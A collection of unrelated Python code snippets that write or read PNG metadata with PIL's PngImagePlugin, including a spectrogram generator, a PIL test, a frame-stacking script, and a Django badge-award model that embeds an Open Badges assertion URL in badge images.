def run(self): print("Running the Thread : ", self.name) cmpt = 0 for i, item in enumerate(self.trackswav): if (cmpt >= 50): break if (item[-3:] == "wav"): if not os.path.exists(self.my_json["dataset_image_path"] + "\\" + self.category + "\\" + item.replace(".wav", ".png")): try: sample_rate, samples = wavfile.read( str(self.my_json['dataset_wav_path'] + '\\' + self.category + '\\' + item)) # samples, sample_rate = lr.load(str(self.my_json['dataset_wav_path']+'\\'+self.category+'\\'+item), mono=True) duration_seconds = len( samples) / sample_rate # 44100 Hz -> 30s. nfft = 2048 # CARE ABOUT THE RESOLUTION -> loss of precision. basis = None noverlap = 128 # number of frequency level. default = 128 spect_Fs = sample_rate / 2 try: fig = plt.figure( frameon=False, figsize=(2, 2) ) #, figsize=(self.height/self.dpi, self.width/self.dpi), dpi=self.dpi) ax = plt.axes() plt.ioff() if (self.colormesh): f, t, Sxx = signal.spectrogram( samples, sample_rate, return_onesided=False) plt.pcolormesh(t, np.fft.fftshift(f), np.fft.fftshift(Sxx, axes=0)) else: plt.specgram(samples, NFFT=nfft, noverlap=noverlap, Fs=spect_Fs, Fc=0, cmap='gray_r', sides='default', mode='default', scale='dB') try: if (self.legend): plt.colorbar(None, use_gridspec=True) plt.title('Spectrogram of ' + item) plt.ylabel('Frequency [Hz]') plt.xlabel('Time [sec]') else: frame = plt.gca() frame.axes.get_xaxis().set_visible(False) frame.axes.get_yaxis().set_visible(False) ax.set_axis_off() fig.savefig( str(self.my_json["dataset_image_path"] + "\\" + self.category + "\\" + item.replace("wav", "png")), frameon="false", bbox_inches='tight', transparent=True, pad_inches=0.0) print(self.name, " Index ", i, ". The spectrogram : ", item.replace('wav', 'png'), " was created.") try: im = Image.open( str(self.my_json["dataset_image_path"] + "\\" + self.category + "\\" + item.replace("wav", "png"))) try: meta = PngImagePlugin.PngInfo() my_meta = { "length_secs": str(duration_seconds), "category_shaped": str(self.corresponding_cat_array), "category": self.category, "overlap": str(noverlap), "nfft": str(nfft), "Fs": str(spect_Fs), 'Frequency': str(sample_rate) } for x in my_meta: meta.add_text(x, my_meta[x]) im.save( str(self. my_json["dataset_image_path"] + "\\" + self.category + "\\" + item.replace("wav", "png")), "png", pnginfo=meta) except Exception as inst: print(inst) print( self.name, " Index ", i, ". Error creating the metadatas.") except Exception as inst: print("\nException : ", inst) print( self.name, " Index ", i, ". The png image representing the spectrogram can't be opened." ) except: print( self.name, " Index ", i, ". The spectrogram : ", item.replace('wav', 'png'), " can't be created. Error creating/hiding the legend of the spectrogram." ) plt.close() except Exception as inst: print("Exception : ", inst) print( self.name, " Index ", i, ". The spectrogram : ", item.replace('wav', 'png'), " can't be created. Error creating the spectogram." ) cmpt += 1 except: print( self.name, " Index ", i, ". The spectrogram : ", item.replace('wav', 'png'), " can't be created. Error reading the data from the wav file and extracting the frames." ) else: print(self.name, " Index ", i, ". The spectrogram : ", item.replace('wav', 'png'), " already exists.") else: print(self.name, " : Error exporting creating the png. the ", item, " isn't at the good format.\n") print("The thread : ", self.name, " is terminated.")
def rt_text(value): im = Image.new("RGB", (32, 32)) info = PngImagePlugin.PngInfo() info.add_text("Text", value) im = roundtrip(im, pnginfo=info) assert im.info == {"Text": value}
'00000005.jpg', '00000006.jpg', '00000007.jpg', ] bitmaps = [] for i in images: bitmaps.append(Image.open(i)) # 创建目标图片 sample = bitmaps[0] width = sample.width height = sample.height result = Image.new('RGB', (width, height * len(bitmaps))) print(f'Width: {width}') print(f'Height: {height} x {len(bitmaps)}\n') # 循环复制像素 for y in range(0, height): print(f'copying {y+1}/{height}', end='\r') for x in range(0, width): for i in range(0, len(bitmaps)): result.putpixel((x, 7 * y + i), bitmaps[i].getpixel((x, y))) print('Finish!') # 写入exif数据 meta = PngImagePlugin.PngInfo() meta.add_text('Frames', str(len(bitmaps))) # result.save('result.png',pnginfo=meta) result.convert('P').save('result.png', pnginfo=meta)
class Award(models.Model): """Representation of a badge awarded to a user""" admin_objects = models.Manager() objects = AwardManager() badge = models.ForeignKey(Badge) image = models.ImageField(blank=True, null=True, storage=BADGE_UPLOADS_FS, upload_to=mk_upload_to('image', 'png')) claim_code = models.CharField(max_length=32, blank=True, default='', unique=False, db_index=True, help_text="Code used to claim this award") user = models.ForeignKey(User, related_name="award_user") creator = models.ForeignKey(User, related_name="award_creator", blank=True, null=True) hidden = models.BooleanField(default=False) created = models.DateTimeField(auto_now_add=True, blank=False) modified = models.DateTimeField(auto_now=True, blank=False) get_permissions_for = get_permissions_for class Meta: ordering = ['-modified', '-created'] def __unicode__(self): by = self.creator and (u' by %s' % self.creator) or u'' return u'Award of %s to %s%s' % (self.badge, self.user, by) @models.permalink def get_absolute_url(self): return ('badger.views.award_detail', (self.badge.slug, self.pk)) def get_upload_meta(self): u = self.user.username return ("award/%s/%s/%s" % (u[0], u[1], u), self.badge.slug) def allows_detail_by(self, user): # TODO: Need some logic here, someday. return True def save(self, *args, **kwargs): # Signals and some bits of logic only happen on a new award. is_new = not self.pk if is_new: # Bail if this is an attempt to double-award a unique badge if self.badge.unique and self.badge.is_awarded_to(self.user): raise BadgeAlreadyAwardedException() # Only fire will-be-awarded signal on a new award. badge_will_be_awarded.send(sender=self.__class__, award=self) super(Award, self).save(*args, **kwargs) # Called after super.save(), so we have some auto-gen fields like pk # and created self.bake_obi_image() if is_new: # Only fire was-awarded signal on a new award. badge_was_awarded.send(sender=self.__class__, award=self) # Since this badge was just awarded, check the prerequisites on all # badges that count this as one. for dep_badge in self.badge.badge_set.all(): dep_badge.check_prerequisites(self.user, self.badge, self) # Reset any progress for this user & badge upon award. Progress.objects.filter(user=self.user, badge=self.badge).delete() def as_obi_assertion(self, request=None): badge_data = self.badge.as_obi_serialization(request) if request: base_url = request.build_absolute_uri('/')[:-1] else: base_url = 'http://%s' % (Site.objects.get_current().domain, ) # If this award has a creator (ie. not system-issued), tweak the issuer # data to reflect award creator. # TODO: Is this actually a good idea? Or should issuer be site-wide if self.creator: badge_data['issuer'] = { # TODO: Get from user profile instead? "origin": base_url, "name": self.creator.username, "contact": self.creator.email } # see: https://github.com/brianlovesdata/openbadges/wiki/Assertions # TODO: This salt is stable, and the badge.pk is generally not # disclosed anywhere, but is it obscured enough? hash_salt = (hashlib.md5('%s-%s' % (self.badge.pk, self.pk)).hexdigest()) recipient_text = '%s%s' % (self.user.email, hash_salt) recipient_hash = ('sha256$%s' % hashlib.sha256(recipient_text).hexdigest()) assertion = { "recipient": recipient_hash, "salt": hash_salt, "evidence": urljoin(base_url, self.get_absolute_url()), # TODO: implement award expiration # "expires": self.expires.strftime('%s'), "issued_on": self.created.strftime('%s'), "badge": badge_data } return assertion def bake_obi_image(self, request=None): """Bake the OBI JSON badge award assertion into a copy of the original badge's image, if one exists.""" if request: base_url = request.build_absolute_uri('/') else: base_url = 'http://%s' % (Site.objects.get_current().domain, ) if self.badge.image: # Make a duplicate of the badge image self.badge.image.open() img_copy_fh = StringIO(self.badge.image.file.read()) else: # Make a copy of the default badge image img_copy_fh = StringIO(open(DEFAULT_BADGE_IMAGE, 'rb').read()) try: # Try processing the image copy, bail if the image is bad. img = Image.open(img_copy_fh) except IOError, e: return False # Here's where the baking gets done. JSON representation of the OBI # assertion gets written into the "openbadges" metadata field # see: http://blog.client9.com/2007/08/python-pil-and-png-metadata-take-2.html # see: https://github.com/mozilla/openbadges/blob/development/lib/baker.js # see: https://github.com/mozilla/openbadges/blob/development/controllers/baker.js from PIL import PngImagePlugin meta = PngImagePlugin.PngInfo() # TODO: Will need this, if we stop doing hosted assertions # assertion = self.as_obi_assertion(request) # meta.add_text('openbadges', json.dumps(assertion)) hosted_assertion_url = '%s%s' % (base_url, reverse( 'badger.award_detail_json', args=(self.badge.slug, self.id))) meta.add_text('openbadges', hosted_assertion_url) # And, finally save out the baked image. new_img = StringIO() img.save(new_img, "PNG", pnginfo=meta) img_data = new_img.getvalue() name_before = self.image.name self.image.save('', ContentFile(img_data), False) if (self.image.storage.exists(name_before)): self.image.storage.delete(name_before) # Update the image field with the new image name # NOTE: Can't do a full save(), because this gets called in save() Award.objects.filter(pk=self.pk).update(image=self.image) return True
while True: s = fp.read(629) print s if not s: break p.feed(s) im = p.close() im.save("o2.png") #im.show() # chunky = png.PngStream(im) chunks_are_us = png.getchunks(fp) #for item in chunks_are_us: #print item[0] #this returns these: # IHDR (required) # IDAT (image data chunk 1) # IDAT (image data chunk 2) # IEND (required) #no itXt chunk or other metadata #this works but is not informative # for k,v in im.info.iteritems(): # print k,v